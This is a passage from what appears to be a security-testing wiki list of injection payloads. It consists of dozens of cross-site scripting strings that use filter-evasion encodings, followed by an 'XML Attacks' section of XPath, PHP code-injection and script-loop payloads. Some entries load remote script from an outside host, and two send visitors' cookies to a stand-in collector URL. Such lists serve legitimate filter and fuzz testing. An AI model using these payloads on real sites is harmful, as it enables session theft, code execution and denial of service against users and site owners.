&amp;quot;&amp;amp;lt;EMBED SRC=&amp;quot;&amp;quot;data:image/svg+xml;base64,PHN2ZyB4bWxuczpzdmc9Imh0dH A6Ly93d3cudzMub3JnLzIwMDAvc3ZnIiB4bWxucz0iaHR0cDovL3d3dy53My5vcmcv MjAwMC9zdmciIHhtbG5zOnhsaW5rPSJodHRwOi8vd3d3LnczLm9yZy8xOTk5L3hs aW5rIiB2ZXJzaW9uPSIxLjAiIHg9IjAiIHk9IjAiIHdpZHRoPSIxOTQiIGhlaWdodD0iMjAw IiBpZD0ieHNzIj48c2NyaXB0IHR5cGU9InRleHQvZWNtYXNjcmlwdCI+YWxlcnQoIlh TUyIpOzwvc2NyaXB0Pjwvc3ZnPg==&amp;quot;&amp;quot; type=&amp;quot;&amp;quot;image/svg+xml&amp;quot;&amp;quot; AllowScriptAccess=&amp;quot;&amp;quot;always&amp;quot;&amp;quot;&amp;amp;gt;&amp;amp;lt;/EMBED&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;HTML xmlns:xss&amp;amp;gt;&amp;amp;lt;?import namespace=&amp;quot;&amp;quot;xss&amp;quot;&amp;quot; implementation=&amp;quot;&amp;quot;http://ha.ckers.org/xss.htc&amp;quot;&amp;quot;&amp;amp;gt;&amp;amp;lt;xss:xss&amp;amp;gt;XSS&amp;amp;lt;/xss:xss&amp;amp;gt;&amp;amp;lt;/HTML&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;XML ID=I&amp;amp;gt;&amp;amp;lt;X&amp;amp;gt;&amp;amp;lt;C&amp;amp;gt;&amp;amp;lt;![CDATA[&amp;amp;lt;IMG SRC=&amp;quot;&amp;quot;javas]]&amp;amp;gt;&amp;amp;lt;![CDATA[cript:alert('XSS');&amp;quot;&amp;quot;&amp;amp;gt;]]&amp;amp;gt;&amp;amp;lt;/C&amp;amp;gt;&amp;amp;lt;/X&amp;amp;gt;&amp;amp;lt;/xml&amp;amp;gt;&amp;amp;lt;SPAN DATASRC=#I DATAFLD=C DATAFORMATAS=HTML&amp;amp;gt;&amp;amp;lt;/SPAN&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;XML ID=&amp;quot;&amp;quot;xss&amp;quot;&amp;quot;&amp;amp;gt;&amp;amp;lt;I&amp;amp;gt;&amp;amp;lt;B&amp;amp;gt;&amp;amp;lt;IMG SRC=&amp;quot;&amp;quot;javas&amp;amp;lt;!-- --&amp;amp;gt;cript:alert('XSS')&amp;quot;&amp;quot;&amp;amp;gt;&amp;amp;lt;/B&amp;amp;gt;&amp;amp;lt;/I&amp;amp;gt;&amp;amp;lt;/XML&amp;amp;gt;&amp;amp;lt;SPAN DATASRC=&amp;quot;&amp;quot;#xss&amp;quot;&amp;quot; DATAFLD=&amp;quot;&amp;quot;B&amp;quot;&amp;quot; DATAFORMATAS=&amp;quot;&amp;quot;HTML&amp;quot;&amp;quot;&amp;amp;gt;&amp;amp;lt;/SPAN&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;XML SRC=&amp;quot;&amp;quot;xsstest.xml&amp;quot;&amp;quot; ID=I&amp;amp;gt;&amp;amp;lt;/XML&amp;amp;gt;&amp;amp;lt;SPAN DATASRC=#I DATAFLD=C DATAFORMATAS=HTML&amp;amp;gt;&amp;amp;lt;/SPAN&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;HTML&amp;amp;gt;&amp;amp;lt;BODY&amp;amp;gt;&amp;amp;lt;?xml:namespace prefix=&amp;quot;&amp;quot;t&amp;quot;&amp;quot; ns=&amp;quot;&amp;quot;urn:schemas-microsoft-com:time&amp;quot;&amp;quot;&amp;amp;gt;&amp;amp;lt;?import namespace=&amp;quot;&amp;quot;t&amp;quot;&amp;quot; implementation=&amp;quot;&amp;quot;#default#time2&amp;quot;&amp;quot;&amp;amp;gt;&amp;amp;lt;t:set attributeName=&amp;quot;&amp;quot;innerHTML&amp;quot;&amp;quot; to=&amp;quot;&amp;quot;XSS&amp;amp;lt;SCRIPT DEFER&amp;amp;gt;alert(&amp;quot;&amp;quot;XSS&amp;quot;&amp;quot;)&amp;amp;lt;/SCRIPT&amp;amp;gt;&amp;quot;&amp;quot;&amp;amp;gt;&amp;amp;lt;/BODY&amp;amp;gt;&amp;amp;lt;/HTML&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;SCRIPT SRC=&amp;quot;&amp;quot;http://ha.ckers.org/xss.jpg&amp;quot;&amp;quot;&amp;amp;gt;&amp;amp;lt;/SCRIPT&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;!--#exec cmd=&amp;quot;&amp;quot;/bin/echo '&amp;amp;lt;SCR'&amp;quot;&amp;quot;--&amp;amp;gt;&amp;amp;lt;!--#exec cmd=&amp;quot;&amp;quot;/bin/echo 'IPT SRC=http://ha.ckers.org/xss.js&amp;amp;gt;&amp;amp;lt;/SCRIPT&amp;amp;gt;'&amp;quot;&amp;quot;--&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;? echo('&amp;amp;lt;SCR)';echo('IPT&amp;amp;gt;alert(&amp;quot;&amp;quot;XSS&amp;quot;&amp;quot;)&amp;amp;lt;/SCRIPT&amp;amp;gt;');&amp;amp;nbsp;?&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;META HTTP-EQUIV=&amp;quot;&amp;quot;Set-Cookie&amp;quot;&amp;quot; Content=&amp;quot;&amp;quot;USERID=&amp;amp;lt;SCRIPT&amp;amp;gt;alert('XSS')&amp;amp;lt;/SCRIPT&amp;amp;gt;&amp;quot;&amp;quot;&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;HEAD&amp;amp;gt;&amp;amp;lt;META HTTP-EQUIV=&amp;quot;&amp;quot;CONTENT-TYPE&amp;quot;&amp;quot; CONTENT=&amp;quot;&amp;quot;text/html; charset=UTF-7&amp;quot;&amp;quot;&amp;amp;gt; &amp;amp;lt;/HEAD&amp;amp;gt;+ADw-SCRIPT+AD4-alert('XSS');+ADw-/SCRIPT+AD4-&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;SCRIPT a=&amp;quot;&amp;quot;&amp;amp;gt;&amp;quot;&amp;quot; SRC=&amp;quot;&amp;quot;http://ha.ckers.org/xss.js&amp;quot;&amp;quot;&amp;amp;gt;&amp;amp;lt;/SCRIPT&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;SCRIPT =&amp;quot;&amp;quot;&amp;amp;gt;&amp;quot;&amp;quot; SRC=&amp;quot;&amp;quot;http://ha.ckers.org/xss.js&amp;quot;&amp;quot;&amp;amp;gt;&amp;amp;lt;/SCRIPT&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;SCRIPT a=&amp;quot;&amp;quot;&amp;amp;gt;&amp;quot;&amp;quot; '' SRC=&amp;quot;&amp;quot;http://ha.ckers.org/xss.js&amp;quot;&amp;quot;&amp;amp;gt;&amp;amp;lt;/SCRIPT&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;SCRIPT &amp;quot;&amp;quot;a='&amp;amp;gt;'&amp;quot;&amp;quot; SRC=&amp;quot;&amp;quot;http://ha.ckers.org/xss.js&amp;quot;&amp;quot;&amp;amp;gt;&amp;amp;lt;/SCRIPT&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;SCRIPT a=`&amp;amp;gt;` SRC=&amp;quot;&amp;quot;http://ha.ckers.org/xss.js&amp;quot;&amp;quot;&amp;amp;gt;&amp;amp;lt;/SCRIPT&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;SCRIPT a=&amp;quot;&amp;quot;&amp;amp;gt;'&amp;amp;gt;&amp;quot;&amp;quot; SRC=&amp;quot;&amp;quot;http://ha.ckers.org/xss.js&amp;quot;&amp;quot;&amp;amp;gt;&amp;amp;lt;/SCRIPT&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;SCRIPT&amp;amp;gt;document.write(&amp;quot;&amp;quot;&amp;amp;lt;SCRI&amp;quot;&amp;quot;);&amp;amp;lt;/SCRIPT&amp;amp;gt;PT SRC=&amp;quot;&amp;quot;http://ha.ckers.org/xss.js&amp;quot;&amp;quot;&amp;amp;gt;&amp;amp;lt;/SCRIPT&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;A HREF=&amp;quot;&amp;quot;http://66.102.7.147/&amp;quot;&amp;quot;&amp;amp;gt;XSS&amp;amp;lt;/A&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;A HREF=&amp;quot;&amp;quot;http://%77%77%77%2E%67%6F%6F%67%6C%65%2E%63%6F%6D&amp;quot;&amp;quot;&amp;amp;gt;XSS&amp;amp;lt;/A&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;A HREF=&amp;quot;&amp;quot;http://1113982867/&amp;quot;&amp;quot;&amp;amp;gt;XSS&amp;amp;lt;/A&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;A HREF=&amp;quot;&amp;quot;http://0x42.0x0000066.0x7.0x93/&amp;quot;&amp;quot;&amp;amp;gt;XSS&amp;amp;lt;/A&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;A HREF=&amp;quot;&amp;quot;http://0102.0146.0007.00000223/&amp;quot;&amp;quot;&amp;amp;gt;XSS&amp;amp;lt;/A&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;A HREF=&amp;quot;&amp;quot;h\ntt\tp://6&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;A HREF=&amp;quot;&amp;quot;//www.google.com/&amp;quot;&amp;quot;&amp;amp;gt;XSS&amp;amp;lt;/A&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;A HREF=&amp;quot;&amp;quot;//google&amp;quot;&amp;quot;&amp;amp;gt;XSS&amp;amp;lt;/A&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;A HREF=&amp;quot;&amp;quot;http://google.com/&amp;quot;&amp;quot;&amp;amp;gt;XSS&amp;amp;lt;/A&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;A HREF=&amp;quot;&amp;quot;http://www.google.com./&amp;quot;&amp;quot;&amp;amp;gt;XSS&amp;amp;lt;/A&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;A HREF=&amp;quot;&amp;quot;javascript:document.location='http://www.google.com/'&amp;quot;&amp;quot;&amp;amp;gt;XSS&amp;amp;lt;/A&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;A HREF=&amp;quot;&amp;quot;http://www.gohttp://www.google.com/ogle.com/&amp;quot;&amp;quot;&amp;amp;gt;XSS&amp;amp;lt;/A&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;div onmouseover=&amp;quot;&amp;quot;document.write(&amp;quot;&amp;quot;XSS-XSS-XSS&amp;quot;&amp;quot;);&amp;quot;&amp;quot;&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;img src=&amp;quot;&amp;quot;javascript:document.write(&amp;quot;&amp;quot;XSS-XSS-XSS&amp;quot;&amp;quot;);&amp;quot;&amp;quot;&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;input type=&amp;quot;&amp;quot;image&amp;quot;&amp;quot; dynsrc=&amp;quot;&amp;quot;javascript:document.write(&amp;quot;&amp;quot;XSS-XSS-XSS&amp;quot;&amp;quot;);&amp;quot;&amp;quot;&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;bgsound src=&amp;quot;&amp;quot;javascript:document.write(&amp;quot;&amp;quot;XSS-XSS-XSS&amp;quot;&amp;quot;);&amp;quot;&amp;quot;&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;amp;{document.write(&amp;quot;&amp;quot;XSS-XSS-XSS&amp;quot;&amp;quot;);};&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;img src=&amp;amp;amp;{document.write(&amp;quot;&amp;quot;XSS-XSS-XSS&amp;quot;&amp;quot;);};&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;link rel=&amp;quot;&amp;quot;stylesheet&amp;quot;&amp;quot; href=&amp;quot;&amp;quot;javascript:document.write(&amp;quot;&amp;quot;XSS-XSS-XSS&amp;quot;&amp;quot;);&amp;quot;&amp;quot;&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;iframe src=&amp;quot;&amp;quot;vbscript:document.write(&amp;quot;&amp;quot;XSS-XSS-XSS&amp;quot;&amp;quot;);&amp;quot;&amp;quot;&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;img src=&amp;quot;&amp;quot;livescript:document.write(&amp;quot;&amp;quot;XSS-XSS-XSS&amp;quot;&amp;quot;);&amp;quot;&amp;quot;&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;a href=&amp;quot;&amp;quot;about:&amp;amp;lt;script&amp;amp;gt;document.write(&amp;quot;&amp;quot;XSS-XSS-XSS&amp;quot;&amp;quot;);&amp;amp;lt;/script&amp;amp;gt;&amp;quot;&amp;quot;&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;meta http-equiv=&amp;quot;&amp;quot;refresh&amp;quot;&amp;quot; content=&amp;quot;&amp;quot;0;url=javascript:document.write(&amp;quot;&amp;quot;XSS-XSS-XSS&amp;quot;&amp;quot;);&amp;quot;&amp;quot;&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;body onload=&amp;quot;&amp;quot;document.write(&amp;quot;&amp;quot;XSS-XSS-XSS&amp;quot;&amp;quot;);&amp;quot;&amp;quot;&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;div style=&amp;quot;&amp;quot;background-image: url(javascript:document.write(&amp;quot;&amp;quot;XSS-XSS-XSS&amp;quot;&amp;quot;););&amp;quot;&amp;quot;&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;div style=&amp;quot;&amp;quot;behaviour: url([link to code]);&amp;quot;&amp;quot;&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;div style=&amp;quot;&amp;quot;binding: url([link to code]);&amp;quot;&amp;quot;&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;div style=&amp;quot;&amp;quot;width: expression(document.write(&amp;quot;&amp;quot;XSS-XSS-XSS&amp;quot;&amp;quot;););&amp;quot;&amp;quot;&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;style type=&amp;quot;&amp;quot;text/javascript&amp;quot;&amp;quot;&amp;amp;gt;document.write(&amp;quot;&amp;quot;XSS-XSS-XSS&amp;quot;&amp;quot;);&amp;amp;lt;/style&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;object classid=&amp;quot;&amp;quot;clsid:...&amp;quot;&amp;quot; codebase=&amp;quot;&amp;quot;javascript:document.write(&amp;quot;&amp;quot;XSS-XSS-XSS&amp;quot;&amp;quot;);&amp;quot;&amp;quot;&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;style&amp;amp;gt;&amp;amp;lt;!--&amp;amp;lt;/style&amp;amp;gt;&amp;amp;lt;script&amp;amp;gt;document.write(&amp;quot;&amp;quot;XSS-XSS-XSS&amp;quot;&amp;quot;);//--&amp;amp;gt;&amp;amp;lt;/script&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;![CDATA[&amp;amp;lt;!--]]&amp;amp;gt;&amp;amp;lt;script&amp;amp;gt;document.write(&amp;quot;&amp;quot;XSS-XSS-XSS&amp;quot;&amp;quot;);//--&amp;amp;gt;&amp;amp;lt;/script&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;&amp;amp;lt;script&amp;amp;gt;document.write(&amp;quot;&amp;quot;XSS-XSS-XSS&amp;quot;&amp;quot;);&amp;amp;lt;/script&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;img src=&amp;quot;&amp;quot;blah&amp;quot;&amp;quot;onmouseover=&amp;quot;&amp;quot;document.write(&amp;quot;&amp;quot;XSS-XSS-XSS&amp;quot;&amp;quot;);&amp;quot;&amp;quot;&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;img src=&amp;quot;&amp;quot;blah&amp;amp;gt;&amp;quot;&amp;quot; onmouseover=&amp;quot;&amp;quot;document.write(&amp;quot;&amp;quot;XSS-XSS-XSS&amp;quot;&amp;quot;);&amp;quot;&amp;quot;&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;div datafld=&amp;quot;&amp;quot;b&amp;quot;&amp;quot; dataformatas=&amp;quot;&amp;quot;html&amp;quot;&amp;quot; datasrc=&amp;quot;&amp;quot;#X&amp;quot;&amp;quot;&amp;amp;gt;&amp;amp;lt;/div&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;a href=&amp;quot;&amp;quot;javascript#document.write(&amp;quot;&amp;quot;XSS-XSS-XSS&amp;quot;&amp;quot;);&amp;quot;&amp;quot;&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;img dynsrc=&amp;quot;&amp;quot;javascript:document.write(&amp;quot;&amp;quot;XSS-XSS-XSS&amp;quot;&amp;quot;);&amp;quot;&amp;quot;&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;amp;&amp;amp;lt;script&amp;amp;gt;document.write(&amp;quot;&amp;quot;XSS-XSS-XSS&amp;quot;&amp;quot;);&amp;amp;lt;/script&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;img src=&amp;quot;&amp;quot;mocha:document.write(&amp;quot;&amp;quot;XSS-XSS-XSS&amp;quot;&amp;quot;);&amp;quot;&amp;quot;&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;div style=&amp;quot;&amp;quot;binding: url([link to code]);&amp;quot;&amp;quot;&amp;amp;gt; [Mozilla]&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;!-- -- --&amp;amp;gt;&amp;amp;lt;script&amp;amp;gt;document.write(&amp;quot;&amp;quot;XSS-XSS-XSS&amp;quot;&amp;quot;);&amp;amp;lt;/script&amp;amp;gt;&amp;amp;lt;!-- -- --&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;xml src=&amp;quot;&amp;quot;javascript:document.write(&amp;quot;&amp;quot;XSS-XSS-XSS&amp;quot;&amp;quot;);&amp;quot;&amp;quot;&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;xml id=&amp;quot;&amp;quot;X&amp;quot;&amp;quot;&amp;amp;gt;&amp;amp;lt;a&amp;amp;gt;&amp;amp;lt;b&amp;amp;gt;&amp;amp;lt;script&amp;amp;gt;document.write(&amp;quot;&amp;quot;XSS-XSS-XSS&amp;quot;&amp;quot;);&amp;amp;lt;/script&amp;amp;gt;;&amp;amp;lt;/b&amp;amp;gt;&amp;amp;lt;/a&amp;amp;gt;&amp;amp;lt;/xml&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;[\xC0][\xBC]script&amp;amp;gt;document.write(&amp;quot;&amp;quot;XSS-XSS-XSS&amp;quot;&amp;quot;);[\xC0][\xBC]/script&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;amp;gt;&amp;amp;lt;script&amp;amp;gt;&lt;br /&gt;
&amp;quot;&amp;amp;lt;script&amp;amp;gt;alert(&amp;quot;&amp;quot;WXSS&amp;quot;&amp;quot;)&amp;amp;lt;/script&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;&amp;amp;lt;script&amp;amp;gt;alert(&amp;quot;&amp;quot;WXSS&amp;quot;&amp;quot;);//&amp;amp;lt;&amp;amp;lt;/script&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;amp;lt;script&amp;amp;gt;alert(document.cookie)&amp;amp;lt;/script&amp;amp;gt;&lt;br /&gt;
'&amp;amp;gt;&amp;amp;lt;script&amp;amp;gt;alert(document.cookie)&amp;amp;lt;/script&amp;amp;gt;&lt;br /&gt;
'&amp;amp;gt;&amp;amp;lt;script&amp;amp;gt;alert(document.cookie);&amp;amp;lt;/script&amp;amp;gt;&lt;br /&gt;
&amp;quot;%3cscript%3ealert(&amp;quot;&amp;quot;WXSS&amp;quot;&amp;quot;);%3c/script%3e&amp;quot;&lt;br /&gt;
%3cscript%3ealert(document.cookie);%3c%2fscript%3e&lt;br /&gt;
%3Cscript%3Ealert(%22X%20SS%22);%3C/script%3E&lt;br /&gt;
&amp;amp;amp;ltscript&amp;amp;amp;gtalert(document.cookie);&amp;amp;lt;/script&amp;amp;gt;&lt;br /&gt;
&amp;amp;amp;ltscript&amp;amp;amp;gtalert(document.cookie);&amp;amp;amp;ltscript&amp;amp;amp;gtalert&lt;br /&gt;
&amp;amp;lt;xss&amp;amp;gt;&amp;amp;lt;script&amp;amp;gt;alert('WXSS')&amp;amp;lt;/script&amp;amp;gt;&amp;amp;lt;/vulnerable&amp;amp;gt;&lt;br /&gt;
&amp;amp;lt;IMG%20SRC='javascript:alert(document.cookie)'&amp;amp;gt;&lt;br /&gt;
&amp;quot;&amp;amp;lt;IMG%20SRC=&amp;quot;&amp;quot;javascript:alert('WXSS');&amp;quot;&amp;quot;&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;IMG%20SRC=&amp;quot;&amp;quot;javascript:alert('WXSS')&amp;quot;&amp;quot;&amp;quot;&lt;br /&gt;
&amp;amp;lt;IMG%20SRC=JaVaScRiPt:alert('WXSS')&amp;amp;gt;&lt;br /&gt;
&amp;amp;lt;IMG%20SRC=javascript:alert(&amp;quot;WXSS&amp;quot;)&amp;amp;gt;&lt;br /&gt;
&amp;quot;&amp;amp;lt;IMG%20SRC=`javascript:alert(&amp;quot;&amp;quot;'WXSS'&amp;quot;&amp;quot;)`&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;IMG%20&amp;quot;&amp;quot;&amp;quot;&amp;quot;&amp;quot;&amp;quot;&amp;amp;gt;&amp;amp;lt;SCRIPT&amp;amp;gt;alert(&amp;quot;&amp;quot;WXSS&amp;quot;&amp;quot;)&amp;amp;lt;/SCRIPT&amp;amp;gt;&amp;quot;&amp;quot;&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;amp;lt;IMG%20SRC=javascript:alert(String.fromCharCode(88,83,83))&amp;amp;gt;&lt;br /&gt;
&amp;amp;lt;IMG%20SRC='javasc&lt;br /&gt;
&amp;quot;&amp;amp;lt;IMG%20SRC=&amp;quot;&amp;quot;jav&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;IMG%20SRC=&amp;quot;&amp;quot;jav	ascript:alert('WXSS');&amp;quot;&amp;quot;&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;IMG%20SRC=&amp;quot;&amp;quot;jav&lt;br /&gt;
ascript:alert('WXSS');&amp;quot;&amp;quot;&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;IMG%20SRC=&amp;quot;&amp;quot;jav&lt;br /&gt;
ascript:alert('WXSS');&amp;quot;&amp;quot;&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;IMG%20SRC=&amp;quot;&amp;quot;%20&amp;amp;amp;#14;%20javascript:alert('WXSS');&amp;quot;&amp;quot;&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;IMG%20DYNSRC=&amp;quot;&amp;quot;javascript:alert('WXSS')&amp;quot;&amp;quot;&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;IMG%20LOWSRC=&amp;quot;&amp;quot;javascript:alert('WXSS')&amp;quot;&amp;quot;&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;amp;lt;IMG%20SRC='%26%23x6a;avasc%26%23000010ript:a%26%23x6c;ert(document.%26%23x63;ookie)'&amp;amp;gt;&lt;br /&gt;
&amp;amp;lt;IMG%20SRC=javascript:alert('XSS')&amp;amp;gt;&lt;br /&gt;
&amp;amp;lt;IMG%20SRC=&amp;amp;amp;#0000106&amp;amp;amp;#0000097&amp;amp;amp;#0000118&amp;amp;amp;#0000097&amp;amp;amp;#0000115&amp;amp;amp;#0000099&amp;amp;amp;#0000114&amp;amp;amp;#0000105&amp;amp;amp;#0000112&amp;amp;amp;#0000116&amp;amp;amp;#0000058&amp;amp;amp;#0000097&amp;amp;amp;#0000108&amp;amp;amp;#0000101&amp;amp;amp;#0000114&amp;amp;amp;#0000116&amp;amp;amp;#0000040&amp;amp;amp;#0000039&amp;amp;amp;#0000088&amp;amp;amp;#0000083&amp;amp;amp;#0000083&amp;amp;amp;#0000039&amp;amp;amp;#0000041&amp;amp;gt;&lt;br /&gt;
&amp;amp;lt;IMG%20SRC=&amp;amp;amp;#x6A&amp;amp;amp;#x61&amp;amp;amp;#x76&amp;amp;amp;#x61&amp;amp;amp;#x73&amp;amp;amp;#x63&amp;amp;amp;#x72&amp;amp;amp;#x69&amp;amp;amp;#x70&amp;amp;amp;#x74&amp;amp;amp;#x3A&amp;amp;amp;#x61&amp;amp;amp;#x6C&amp;amp;amp;#x65&amp;amp;amp;#x72&amp;amp;amp;#x74&amp;amp;amp;#x28&amp;amp;amp;#x27&amp;amp;amp;#x58&amp;amp;amp;#x53&amp;amp;amp;#x53&amp;amp;amp;#x27&amp;amp;amp;#x29&amp;amp;gt;&lt;br /&gt;
'%3CIFRAME%20SRC=javascript:alert(%2527XSS%2527)%3E%3C/IFRAME%3E&lt;br /&gt;
&amp;quot;&amp;amp;gt;&amp;amp;lt;script&amp;amp;gt;document.location='http://cookieStealer/cgi-bin/cookie.cgi?'+document.cookie&amp;amp;lt;/script&amp;amp;gt;&lt;br /&gt;
%22%3E%3Cscript%3Edocument%2Elocation%3D%27http%3A%2F%2Fyour%2Esite%2Ecom%2Fcgi%2Dbin%2Fcookie%2Ecgi%3F%27%20%2Bdocument%2Ecookie%3C%2Fscript%3E&lt;br /&gt;
';alert(String.fromCharCode(88,83,83))//\';alert(String.fromCharCode(88,83,83))//;alert(String.fromCharCode(88,83,83))//\;alert(String.fromCharCode(88,83,83))//&amp;amp;gt;&amp;amp;lt;/SCRIPT&amp;amp;gt;!--&amp;amp;lt;SCRIPT&amp;amp;gt;alert(String.fromCharCode(88,83,83))&amp;amp;lt;/SCRIPT&amp;amp;gt;=&amp;amp;amp;{}&lt;br /&gt;
'';!--&amp;amp;lt;XSS&amp;amp;gt;=&amp;amp;amp;{()}&amp;quot;&lt;br /&gt;
&amp;lt;/pre&amp;gt; &lt;br /&gt;
&amp;lt;br&amp;gt;&lt;br /&gt;
&lt;br /&gt;
=== XML Attacks - (Update: 11 August 2009 - Total Statements: 15)  ===&lt;br /&gt;
&amp;lt;pre&amp;gt;Statements&lt;br /&gt;
count(/child::node())&lt;br /&gt;
x' or name()='username' or 'x'='y&lt;br /&gt;
&amp;amp;lt;name&amp;amp;gt;','')); phpinfo(); exit;/*&amp;amp;lt;/name&amp;amp;gt;&lt;br /&gt;
&amp;amp;lt;![CDATA[&amp;amp;lt;script&amp;amp;gt;var n=0;while(true){n++;}&amp;amp;lt;/script&amp;amp;gt;]]&amp;amp;gt;&lt;br /&gt;
&amp;amp;lt;![CDATA[&amp;amp;lt;]]&amp;amp;gt;SCRIPT&amp;amp;lt;![CDATA[&amp;amp;gt;]]&amp;amp;gt;alert('XSS');&amp;amp;lt;![CDATA[&amp;amp;lt;]]&amp;amp;gt;/SCRIPT&amp;amp;lt;![CDATA[&amp;amp;gt;]]&amp;amp;gt;&lt;br /&gt;
&amp;quot;&amp;amp;lt;?xml version=&amp;quot;&amp;quot;1.0&amp;quot;&amp;quot; encoding=&amp;quot;&amp;quot;ISO-8859-1&amp;quot;&amp;quot;?&amp;amp;gt;&amp;amp;lt;foo&amp;amp;gt;&amp;amp;lt;![CDATA[&amp;amp;lt;]]&amp;amp;gt;SCRIPT&amp;amp;lt;![CDATA[&amp;amp;gt;]]&amp;amp;gt;alert('XSS');&amp;amp;lt;![CDATA[&amp;amp;lt;]]&amp;amp;gt;/SCRIPT&amp;amp;lt;![CDATA[&amp;amp;gt;]]&amp;amp;gt;&amp;amp;lt;/foo&amp;amp;gt;&amp;quot;&lt;br /&gt;
